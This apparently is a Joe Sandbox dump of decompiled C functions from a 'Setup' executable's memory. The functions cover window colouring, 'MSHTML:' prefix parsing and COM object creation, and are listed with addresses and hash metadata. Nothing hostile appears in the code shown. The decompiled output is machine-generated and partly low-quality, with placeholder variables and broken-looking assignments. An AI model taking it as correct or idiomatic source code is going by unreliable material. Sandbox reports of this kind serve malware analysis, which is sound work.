                                                                                                                                                              C-Code - Quality: 88%
                                                                                                                                                              			E0040DE30(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, struct HWND__* _a12, intOrPtr _a16, void* _a20, intOrPtr* _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				signed char _v17;
                                                                                                                                                              				void* _v24;
                                                                                                                                                              				signed char _v25;
                                                                                                                                                              				char _v32;
                                                                                                                                                              				signed int _v36;
                                                                                                                                                              				void* _v40;
                                                                                                                                                              				long _v44;
                                                                                                                                                              				char _v48;
                                                                                                                                                              				void* _v52;
                                                                                                                                                              				char _v56;
                                                                                                                                                              				char _v60;
                                                                                                                                                              				char _v80;
                                                                                                                                                              				char _v96;
                                                                                                                                                              				intOrPtr* _v100;
                                                                                                                                                              				intOrPtr* _v104;
                                                                                                                                                              				intOrPtr* _v108;
                                                                                                                                                              				intOrPtr* _v112;
                                                                                                                                                              				intOrPtr* _v116;
                                                                                                                                                              				signed int _t183;
                                                                                                                                                              				void* _t189;
                                                                                                                                                              				void* _t236;
                                                                                                                                                              				void* _t245;
                                                                                                                                                              				void* _t275;
                                                                                                                                                              				intOrPtr* _t283;
                                                                                                                                                              				intOrPtr* _t368;
                                                                                                                                                              				void* _t401;
                                                                                                                                                              				void* _t402;
                                                                                                                                                              				signed int _t403;
                                                                                                                                                              
                                                                                                                                                              				_t402 = __esi;
                                                                                                                                                              				_t401 = __edi;
                                                                                                                                                              				_t275 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x514ce0);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t183 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t183 ^ _t403);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				if(_a20 != 0) {
                                                                                                                                                              					 *_a20 = 0;
                                                                                                                                                              					_v24 = 1;
                                                                                                                                                              					_v17 = 0;
                                                                                                                                                              					E00412660(_a4 - 0x24);
                                                                                                                                                              					if( *((intOrPtr*)(_a4 - 0x20)) != 0 &&  *((intOrPtr*)(_a4 - 0x20)) != _a12) {
                                                                                                                                                              						E0040DD20(_a4 - 0x20, 0, 0, 0x507);
                                                                                                                                                              						E0040DDE0(_a4 - 0x24);
                                                                                                                                                              					}
                                                                                                                                                              					if(IsWindow(_a12) == 0) {
                                                                                                                                                              						L55:
                                                                                                                                                              						_t189 = _v24;
                                                                                                                                                              						goto L56;
                                                                                                                                                              					}
                                                                                                                                                              					if( *((intOrPtr*)(_a4 - 0x20)) != _a12) {
                                                                                                                                                              						E0040D210(_a4 - 0x24, _a12);
                                                                                                                                                              						_v17 = 1;
                                                                                                                                                              					}
                                                                                                                                                              					_t365 = _a4;
                                                                                                                                                              					if( *((intOrPtr*)(_a4 + 0xa8)) == 0) {
                                                                                                                                                              						if(E0040D250(_t275, _a4 - 0x20, _t365, _t401, _t402) == 0) {
                                                                                                                                                              							 *((intOrPtr*)(_a4 + 0xa8)) = GetSysColor(5);
                                                                                                                                                              						} else {
                                                                                                                                                              							 *((intOrPtr*)(_a4 + 0xa8)) = GetSysColor(0xf);
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_v25 = 0;
                                                                                                                                                              					_v24 = E004F0010(_t275, _a20, _t401, _t402, _a8, 0x53bab4, _a20,  &_v25, _a32);
                                                                                                                                                              					if(_v24 >= 0) {
                                                                                                                                                              						_v24 = E0040D6B0(_a4 - 0x24,  *_a20, 0, _a16);
                                                                                                                                                              					}
                                                                                                                                                              					_t283 = _a24;
                                                                                                                                                              					_t368 = _a4 + 0x5c;
                                                                                                                                                              					 *_t368 =  *_t283;
                                                                                                                                                              					 *((intOrPtr*)(_t368 + 4)) =  *((intOrPtr*)(_t283 + 4));
                                                                                                                                                              					 *((intOrPtr*)(_t368 + 8)) =  *((intOrPtr*)(_t283 + 8));
                                                                                                                                                              					 *((intOrPtr*)(_t368 + 0xc)) =  *((intOrPtr*)(_t283 + 0xc));
                                                                                                                                                              					if(_v24 >= 0 &&  *_a20 != 0 && _a28 != 0) {
                                                                                                                                                              						E00414CE0( *_a20, _a28, _a4 + 0x5c, _a4 + 0x70);
                                                                                                                                                              					}
                                                                                                                                                              					if(_v24 < 0 || (_v25 & 0x000000ff) == 0 ||  *_a20 == 0) {
                                                                                                                                                              						L49:
                                                                                                                                                              						if(_v24 < 0 || (E00412640(_a4 + 0x3c, 0) & 0x000000ff) != 0) {
                                                                                                                                                              							E00412660(_a4 - 0x24);
                                                                                                                                                              							if( *((intOrPtr*)(_a4 - 0x20)) != 0) {
                                                                                                                                                              								E0040DD20(_a4 - 0x20, 0, 0, 0x507);
                                                                                                                                                              								if(_v24 < 0 && (_v17 & 0x000000ff) != 0) {
                                                                                                                                                              									E0040DDE0(_a4 - 0x24);
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						goto L55;
                                                                                                                                                              					} else {
                                                                                                                                                              						if((E00416C00(_a4 - 0x20) & 0x00300000) != 0) {
                                                                                                                                                              							_v36 = E00416C00(_a4 - 0x20);
                                                                                                                                                              							E00415FF0(_a4 - 0x20, 0xfffffff0, _v36 & 0xffcfffff);
                                                                                                                                                              							E00416C20(_a4 - 0x20, 0, 0, 0, 0, 0, 0x37);
                                                                                                                                                              						} else {
                                                                                                                                                              							 *(_a4 + 0xbc) =  *(_a4 + 0xbc) | 0x00000008;
                                                                                                                                                              						}
                                                                                                                                                              						E00417520( *_a20);
                                                                                                                                                              						_v8 = 0;
                                                                                                                                                              						if(( *_a8 & 0x0000ffff) == 0x4d || ( *_a8 & 0x0000ffff) == 0x6d) {
                                                                                                                                                              							if((_a8[1] & 0x0000ffff) == 0x53 || (_a8[1] & 0x0000ffff) == 0x73) {
                                                                                                                                                              								if((_a8[2] & 0x0000ffff) == 0x48 || (_a8[2] & 0x0000ffff) == 0x68) {
                                                                                                                                                              									if((_a8[3] & 0x0000ffff) == 0x54 || (_a8[3] & 0x0000ffff) == 0x74) {
                                                                                                                                                              										if((_a8[4] & 0x0000ffff) == 0x4d || (_a8[4] & 0x0000ffff) == 0x6d) {
                                                                                                                                                              											if((_a8[5] & 0x0000ffff) == 0x4c || (_a8[5] & 0x0000ffff) == 0x6c) {
                                                                                                                                                              												if((_a8[6] & 0x0000ffff) != 0x3a) {
                                                                                                                                                              													goto L45;
                                                                                                                                                              												}
                                                                                                                                                              												_t236 = E00414FD0(_a8);
                                                                                                                                                              												_t96 = _t236 - 0xe; // -14
                                                                                                                                                              												_v44 = _t236 + _t96;
                                                                                                                                                              												_v40 = GlobalAlloc(0x42, _v44);
                                                                                                                                                              												if(_v40 == 0) {
                                                                                                                                                              													_v24 = 0x8007000e;
                                                                                                                                                              												} else {
                                                                                                                                                              													E00414C90();
                                                                                                                                                              													_v8 = 1;
                                                                                                                                                              													_v52 = GlobalLock(_v40);
                                                                                                                                                              													E004112E0(_t275, _v52, _v44,  &(_a8[7]), _v44);
                                                                                                                                                              													GlobalUnlock(_v40);
                                                                                                                                                              													_t245 = _v40;
                                                                                                                                                              													__imp__CreateStreamOnHGlobal(_t245, 1, E00434050( &_v48));
                                                                                                                                                              													_v24 = _t245;
                                                                                                                                                              													if(_v24 >= 0) {
                                                                                                                                                              														E00414C90();
                                                                                                                                                              														_v8 = 2;
                                                                                                                                                              														_v100 = E0041D530( &_v32);
                                                                                                                                                              														_v24 =  *((intOrPtr*)( *((intOrPtr*)( *_v100))))(_v100, 0x53bad4, E00434050( &_v56));
                                                                                                                                                              														if(_v24 >= 0) {
                                                                                                                                                              															_v104 = E0041D530( &_v56);
                                                                                                                                                              															_v24 =  *((intOrPtr*)( *((intOrPtr*)( *_v104 + 0x14))))(_v104, E0041D530( &_v48));
                                                                                                                                                              														}
                                                                                                                                                              														_v8 = 1;
                                                                                                                                                              														E0040D320();
                                                                                                                                                              													}
                                                                                                                                                              													_v8 = 0;
                                                                                                                                                              													E0040D320();
                                                                                                                                                              												}
                                                                                                                                                              												goto L48;
                                                                                                                                                              											} else {
                                                                                                                                                              												goto L45;
                                                                                                                                                              											}
                                                                                                                                                              										} else {
                                                                                                                                                              											goto L45;
                                                                                                                                                              										}
                                                                                                                                                              									} else {
                                                                                                                                                              										goto L45;
                                                                                                                                                              									}
                                                                                                                                                              								} else {
                                                                                                                                                              									goto L45;
                                                                                                                                                              								}
                                                                                                                                                              							} else {
                                                                                                                                                              								goto L45;
                                                                                                                                                              							}
                                                                                                                                                              						} else {
                                                                                                                                                              							L45:
                                                                                                                                                              							E00414C90();
                                                                                                                                                              							_v8 = 3;
                                                                                                                                                              							_v108 = E0041D530( &_v32);
                                                                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)( *_v108))))(_v108, 0x53bb34, E00434050( &_v60));
                                                                                                                                                              							if(E0041D530( &_v60) != 0) {
                                                                                                                                                              								E00416A10( &_v80);
                                                                                                                                                              								_v8 = 4;
                                                                                                                                                              								E004169E0( &_v96, _a8);
                                                                                                                                                              								_v8 = 5;
                                                                                                                                                              								_v112 = E0041D530( &_v60);
                                                                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_v112 + 0xa4))))(_v112, 0xffffffff);
                                                                                                                                                              								_v116 = E0041D530( &_v60);
                                                                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_v116 + 0xd0))))(_v116,  &_v96,  &_v80,  &_v80,  &_v80,  &_v80);
                                                                                                                                                              								_v8 = 4;
                                                                                                                                                              								E00417430( &_v96);
                                                                                                                                                              								_v8 = 3;
                                                                                                                                                              								E00417430( &_v80);
                                                                                                                                                              							}
                                                                                                                                                              							_v8 = 0;
                                                                                                                                                              							E0040D320();
                                                                                                                                                              							L48:
                                                                                                                                                              							_v8 = 0xffffffff;
                                                                                                                                                              							E0040D320();
                                                                                                                                                              							goto L49;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_t189 = 0x80004003;
                                                                                                                                                              					L56:
                                                                                                                                                              					 *[fs:0x0] = _v16;
                                                                                                                                                              					return _t189;
                                                                                                                                                              				}
                                                                                                                                                              			}

































                                                                                                                                                              0x0040df6a
                                                                                                                                                              0x0040df70
                                                                                                                                                              0x0040df75
                                                                                                                                                              0x0040df7a
                                                                                                                                                              0x0040df80
                                                                                                                                                              0x0040df86
                                                                                                                                                              0x0040df8d
                                                                                                                                                              0x0040dfb5
                                                                                                                                                              0x0040dfb5
                                                                                                                                                              0x0040dfbe
                                                                                                                                                              0x0040e2f9
                                                                                                                                                              0x0040e2fd
                                                                                                                                                              0x0040e319
                                                                                                                                                              0x0040e325
                                                                                                                                                              0x0040e336
                                                                                                                                                              0x0040e33f
                                                                                                                                                              0x0040e34f
                                                                                                                                                              0x0040e34f
                                                                                                                                                              0x0040e33f
                                                                                                                                                              0x0040e325
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040dfdc
                                                                                                                                                              0x0040dfec
                                                                                                                                                              0x0040e010
                                                                                                                                                              0x0040e025
                                                                                                                                                              0x0040e03c
                                                                                                                                                              0x0040dfee
                                                                                                                                                              0x0040dffd
                                                                                                                                                              0x0040dffd
                                                                                                                                                              0x0040e04a
                                                                                                                                                              0x0040e04f
                                                                                                                                                              0x0040e05f
                                                                                                                                                              0x0040e07a
                                                                                                                                                              0x0040e096
                                                                                                                                                              0x0040e0b2
                                                                                                                                                              0x0040e0ce
                                                                                                                                                              0x0040e0ea
                                                                                                                                                              0x0040e106
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040e110
                                                                                                                                                              0x0040e118
                                                                                                                                                              0x0040e11c
                                                                                                                                                              0x0040e12b
                                                                                                                                                              0x0040e132
                                                                                                                                                              0x0040e20e
                                                                                                                                                              0x0040e138
                                                                                                                                                              0x0040e13b
                                                                                                                                                              0x0040e140
                                                                                                                                                              0x0040e14e
                                                                                                                                                              0x0040e164
                                                                                                                                                              0x0040e170
                                                                                                                                                              0x0040e181
                                                                                                                                                              0x0040e185
                                                                                                                                                              0x0040e18b
                                                                                                                                                              0x0040e192
                                                                                                                                                              0x0040e197
                                                                                                                                                              0x0040e19c
                                                                                                                                                              0x0040e1a8
                                                                                                                                                              0x0040e1c6
                                                                                                                                                              0x0040e1cd
                                                                                                                                                              0x0040e1d7
                                                                                                                                                              0x0040e1f1
                                                                                                                                                              0x0040e1f1
                                                                                                                                                              0x0040e1f4
                                                                                                                                                              0x0040e1fb
                                                                                                                                                              0x0040e1fb
                                                                                                                                                              0x0040e200
                                                                                                                                                              0x0040e207
                                                                                                                                                              0x0040e207
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040e21a
                                                                                                                                                              0x0040e21a
                                                                                                                                                              0x0040e21d
                                                                                                                                                              0x0040e222
                                                                                                                                                              0x0040e22e
                                                                                                                                                              0x0040e24a
                                                                                                                                                              0x0040e256
                                                                                                                                                              0x0040e25f
                                                                                                                                                              0x0040e264
                                                                                                                                                              0x0040e26f
                                                                                                                                                              0x0040e274
                                                                                                                                                              0x0040e280
                                                                                                                                                              0x0040e294
                                                                                                                                                              0x0040e29e
                                                                                                                                                              0x0040e2c4
                                                                                                                                                              0x0040e2c6
                                                                                                                                                              0x0040e2cd
                                                                                                                                                              0x0040e2d2
                                                                                                                                                              0x0040e2d9
                                                                                                                                                              0x0040e2d9
                                                                                                                                                              0x0040e2de
                                                                                                                                                              0x0040e2e5
                                                                                                                                                              0x0040e2ea
                                                                                                                                                              0x0040e2ea
                                                                                                                                                              0x0040e2f4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040e2f4
                                                                                                                                                              0x0040e05f
                                                                                                                                                              0x0040de5b
                                                                                                                                                              0x0040de5b
                                                                                                                                                              0x0040e357
                                                                                                                                                              0x0040e35a
                                                                                                                                                              0x0040e365
                                                                                                                                                              0x0040e365

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ColorWindow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4045458706-0
                                                                                                                                                              • Opcode ID: 357680163ede39ea106b7bf8973fb13cc87f1b2c706bd25e2ed9f0712c607f80
                                                                                                                                                              • Instruction ID: a61d8b1859fa99b295e73fed47a3b7f2fdef4b658f642da17756032c367e7847
                                                                                                                                                              • Opcode Fuzzy Hash: 357680163ede39ea106b7bf8973fb13cc87f1b2c706bd25e2ed9f0712c607f80
                                                                                                                                                              • Instruction Fuzzy Hash: 27025E70900108EFDB04DF95C895BEEBBB5EF58304F14816EF815AB2D1DB38AA85CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 39%
                                                                                                                                                              			E004F0010(void* __ebx, signed short* __edx, void* __edi, void* __esi, signed short* _a4, signed short* _a8, signed short* _a12, signed short* _a16, intOrPtr _a20) {
                                                                                                                                                              				signed short _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				signed short* _v20;
                                                                                                                                                              				signed int _v24;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				char _v44;
                                                                                                                                                              				intOrPtr _v48;
                                                                                                                                                              				char _v52;
                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                              				intOrPtr* _v64;
                                                                                                                                                              				signed int _t87;
                                                                                                                                                              				signed int _t88;
                                                                                                                                                              				signed short* _t91;
                                                                                                                                                              				intOrPtr _t104;
                                                                                                                                                              				signed short* _t105;
                                                                                                                                                              				signed short* _t107;
                                                                                                                                                              				signed short* _t113;
                                                                                                                                                              				signed short* _t114;
                                                                                                                                                              				signed short* _t115;
                                                                                                                                                              				signed short* _t116;
                                                                                                                                                              				void* _t121;
                                                                                                                                                              				intOrPtr _t143;
                                                                                                                                                              				void* _t164;
                                                                                                                                                              				void* _t165;
                                                                                                                                                              				signed int _t166;
                                                                                                                                                              
                                                                                                                                                              				_t165 = __esi;
                                                                                                                                                              				_t164 = __edi;
                                                                                                                                                              				_t152 = __edx;
                                                                                                                                                              				_t121 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x505d62);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t87 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t88 = _t87 ^ _t166;
                                                                                                                                                              				_v24 = _t88;
                                                                                                                                                              				_push(_t88);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				if(_a12 != 0) {
                                                                                                                                                              					 *_a12 = 0;
                                                                                                                                                              					_v20 = 0x80004005;
                                                                                                                                                              					 *_a16 = 0;
                                                                                                                                                              					if(_a4 == 0) {
                                                                                                                                                              						L4:
                                                                                                                                                              						_t91 = 0;
                                                                                                                                                              						goto L32;
                                                                                                                                                              					}
                                                                                                                                                              					_t152 = _a4;
                                                                                                                                                              					if(( *_a4 & 0x0000ffff) != 0) {
                                                                                                                                                              						if(( *_a4 & 0x0000ffff) == 0x4d || ( *_a4 & 0x0000ffff) == 0x6d) {
                                                                                                                                                              							if((_a4[1] & 0x0000ffff) == 0x53 || (_a4[1] & 0x0000ffff) == 0x73) {
                                                                                                                                                              								if((_a4[2] & 0x0000ffff) == 0x48 || (_a4[2] & 0x0000ffff) == 0x68) {
                                                                                                                                                              									if((_a4[3] & 0x0000ffff) == 0x54 || (_a4[3] & 0x0000ffff) == 0x74) {
                                                                                                                                                              										if((_a4[4] & 0x0000ffff) == 0x4d || (_a4[4] & 0x0000ffff) == 0x6d) {
                                                                                                                                                              											if((_a4[5] & 0x0000ffff) == 0x4c || (_a4[5] & 0x0000ffff) == 0x6c) {
                                                                                                                                                              												if((_a4[6] & 0x0000ffff) != 0x3a) {
                                                                                                                                                              													goto L19;
                                                                                                                                                              												} else {
                                                                                                                                                              													_t116 = _a12;
                                                                                                                                                              													__imp__CoCreateInstance(0x53baf4, 0, 1, _a8, _t116);
                                                                                                                                                              													_v20 = _t116;
                                                                                                                                                              													_t152 = _a16;
                                                                                                                                                              													 *_a16 = 1;
                                                                                                                                                              													goto L31;
                                                                                                                                                              												}
                                                                                                                                                              											} else {
                                                                                                                                                              												goto L19;
                                                                                                                                                              											}
                                                                                                                                                              										} else {
                                                                                                                                                              											goto L19;
                                                                                                                                                              										}
                                                                                                                                                              									} else {
                                                                                                                                                              										goto L19;
                                                                                                                                                              									}
                                                                                                                                                              								} else {
                                                                                                                                                              									goto L19;
                                                                                                                                                              								}
                                                                                                                                                              							} else {
                                                                                                                                                              								goto L19;
                                                                                                                                                              							}
                                                                                                                                                              						} else {
                                                                                                                                                              							L19:
                                                                                                                                                              							_v56 = E0040B170( &_v52, _a4);
                                                                                                                                                              							_v60 = _v56;
                                                                                                                                                              							_v8 = 0;
                                                                                                                                                              							_v48 = E0040D2B0(_v60, E0041D530(_v60), ":");
                                                                                                                                                              							_v8 = 0xffffffff;
                                                                                                                                                              							E0043F710(_t101,  &_v52);
                                                                                                                                                              							if(_v48 == 0) {
                                                                                                                                                              								_t152 = _a4;
                                                                                                                                                              								if(E00414FD0(_a4) < 0xff) {
                                                                                                                                                              									_t113 = _a4;
                                                                                                                                                              									if(( *_t113 & 0x0000ffff) != 0x7b) {
                                                                                                                                                              										_t152 = _a4;
                                                                                                                                                              										__imp__CLSIDFromProgID(_a4,  &_v40);
                                                                                                                                                              										_v20 = _t113;
                                                                                                                                                              									} else {
                                                                                                                                                              										_t152 =  &_v40;
                                                                                                                                                              										_t114 = _a4;
                                                                                                                                                              										__imp__CLSIDFromString(_t114,  &_v40);
                                                                                                                                                              										_v20 = _t114;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								if(_v20 >= 0) {
                                                                                                                                                              									_t104 = _a20;
                                                                                                                                                              									__imp__#7(_t104);
                                                                                                                                                              									if(_t104 == 0) {
                                                                                                                                                              										_t105 = _a12;
                                                                                                                                                              										_t152 =  &_v40;
                                                                                                                                                              										__imp__CoCreateInstance( &_v40, 0, 1, _a8, _t105);
                                                                                                                                                              										_v20 = _t105;
                                                                                                                                                              									} else {
                                                                                                                                                              										E00414C90();
                                                                                                                                                              										_v8 = 1;
                                                                                                                                                              										_t107 = E00434050( &_v44);
                                                                                                                                                              										__imp__CoGetClassObject( &_v40, 1, 0, 0x53bb14, _t107);
                                                                                                                                                              										_v20 = _t107;
                                                                                                                                                              										if(_v20 >= 0) {
                                                                                                                                                              											_v64 = E0041D530( &_v44);
                                                                                                                                                              											_t143 =  *_v64;
                                                                                                                                                              											_t152 =  *(_t143 + 0x1c);
                                                                                                                                                              											_v20 =  *( *(_t143 + 0x1c))(_v64, 0, 0, _a8, _a20, _a12);
                                                                                                                                                              										}
                                                                                                                                                              										_v8 = 0xffffffff;
                                                                                                                                                              										E0040D320();
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              							} else {
                                                                                                                                                              								_t152 = _a12;
                                                                                                                                                              								_t115 = _a8;
                                                                                                                                                              								__imp__CoCreateInstance(0x53bb04, 0, 1, _t115, _a12);
                                                                                                                                                              								_v20 = _t115;
                                                                                                                                                              								 *_a16 = 1;
                                                                                                                                                              							}
                                                                                                                                                              							L31:
                                                                                                                                                              							_t91 = _v20;
                                                                                                                                                              							goto L32;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					goto L4;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t91 = 0x80004003;
                                                                                                                                                              					L32:
                                                                                                                                                              					 *[fs:0x0] = _v16;
                                                                                                                                                              					return E0044F6C8(_t91, _t121, _v24 ^ _t166, _t152, _t164, _t165);
                                                                                                                                                              				}
                                                                                                                                                              			}





























                                                                                                                                                              0x004f01e0
                                                                                                                                                              0x004f01e4
                                                                                                                                                              0x004f01ea
                                                                                                                                                              0x004f01c9
                                                                                                                                                              0x004f01c9
                                                                                                                                                              0x004f01cd
                                                                                                                                                              0x004f01d1
                                                                                                                                                              0x004f01d7
                                                                                                                                                              0x004f01d7
                                                                                                                                                              0x004f01c7
                                                                                                                                                              0x004f01f1
                                                                                                                                                              0x004f01f7
                                                                                                                                                              0x004f01fb
                                                                                                                                                              0x004f0203
                                                                                                                                                              0x004f0276
                                                                                                                                                              0x004f0282
                                                                                                                                                              0x004f0286
                                                                                                                                                              0x004f028c
                                                                                                                                                              0x004f0205
                                                                                                                                                              0x004f0208
                                                                                                                                                              0x004f020d
                                                                                                                                                              0x004f0217
                                                                                                                                                              0x004f022a
                                                                                                                                                              0x004f0230
                                                                                                                                                              0x004f0237
                                                                                                                                                              0x004f0241
                                                                                                                                                              0x004f025b
                                                                                                                                                              0x004f025d
                                                                                                                                                              0x004f0262
                                                                                                                                                              0x004f0262
                                                                                                                                                              0x004f0265
                                                                                                                                                              0x004f026f
                                                                                                                                                              0x004f026f
                                                                                                                                                              0x004f0203
                                                                                                                                                              0x004f0186
                                                                                                                                                              0x004f0186
                                                                                                                                                              0x004f018a
                                                                                                                                                              0x004f0197
                                                                                                                                                              0x004f019d
                                                                                                                                                              0x004f01a3
                                                                                                                                                              0x004f01a3
                                                                                                                                                              0x004f028f
                                                                                                                                                              0x004f028f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f028f
                                                                                                                                                              0x004f007e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f003e
                                                                                                                                                              0x004f003e
                                                                                                                                                              0x004f0292
                                                                                                                                                              0x004f0295
                                                                                                                                                              0x004f02aa
                                                                                                                                                              0x004f02aa

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: ecb187463da72710d10c6f885a97d4b3e33bfb4eb63038d9beb8c17a8b3ad649
                                                                                                                                                              • Instruction ID: 9b2f63963992360146f666215734e55a870c3115d502bbbb8006fdcbe01b2a89
                                                                                                                                                              • Opcode Fuzzy Hash: ecb187463da72710d10c6f885a97d4b3e33bfb4eb63038d9beb8c17a8b3ad649
                                                                                                                                                              • Instruction Fuzzy Hash: 95916E70A00209EFDB14CF94D884BBEB7B1BF88710F50855AF945AB291D7799E81CBA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0042B000(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                              				char _v20;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                              				char* _t54;
                                                                                                                                                              				char* _t57;
                                                                                                                                                              				intOrPtr* _t59;
                                                                                                                                                              				char* _t61;
                                                                                                                                                              				void* _t67;
                                                                                                                                                              				signed char _t69;
                                                                                                                                                              				intOrPtr* _t70;
                                                                                                                                                              				intOrPtr* _t73;
                                                                                                                                                              				void* _t75;
                                                                                                                                                              				char* _t79;
                                                                                                                                                              				intOrPtr* _t81;
                                                                                                                                                              				void* _t82;
                                                                                                                                                              				signed char _t84;
                                                                                                                                                              				intOrPtr* _t85;
                                                                                                                                                              				void* _t122;
                                                                                                                                                              				void* _t123;
                                                                                                                                                              				void* _t124;
                                                                                                                                                              				void* _t125;
                                                                                                                                                              				void* _t126;
                                                                                                                                                              				void* _t127;
                                                                                                                                                              				void* _t128;
                                                                                                                                                              
                                                                                                                                                              				_v28 = __ecx;
                                                                                                                                                              				_v12 =  *((intOrPtr*)(E0041D410(_v28)));
                                                                                                                                                              				_t5 = _v28 + 4; // 0x8d000000
                                                                                                                                                              				_v16 =  *_t5;
                                                                                                                                                              				_t8 = _v28 + 4; // 0x8d000000
                                                                                                                                                              				_v24 =  *_t8;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t54 = E0043F400(_v12);
                                                                                                                                                              					_t123 = _t122 + 4;
                                                                                                                                                              					_t130 =  *_t54;
                                                                                                                                                              					if( *_t54 != 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_t75 = E00436060(_t130, _v12);
                                                                                                                                                              					_t127 = _t123 + 4;
                                                                                                                                                              					if((E00420AA0(_v28, _t75, _a8) & 0x000000ff) == 0) {
                                                                                                                                                              						_t79 = E0043F400(_v24);
                                                                                                                                                              						_t128 = _t127 + 4;
                                                                                                                                                              						__eflags =  *_t79;
                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                              							_t82 = E00436060(__eflags, _v12);
                                                                                                                                                              							_t128 = _t128 + 4;
                                                                                                                                                              							_t84 = E00420AA0(_v28, _a8, _t82);
                                                                                                                                                              							__eflags = _t84 & 0x000000ff;
                                                                                                                                                              							if((_t84 & 0x000000ff) != 0) {
                                                                                                                                                              								_v24 = _v12;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						_v16 = _v12;
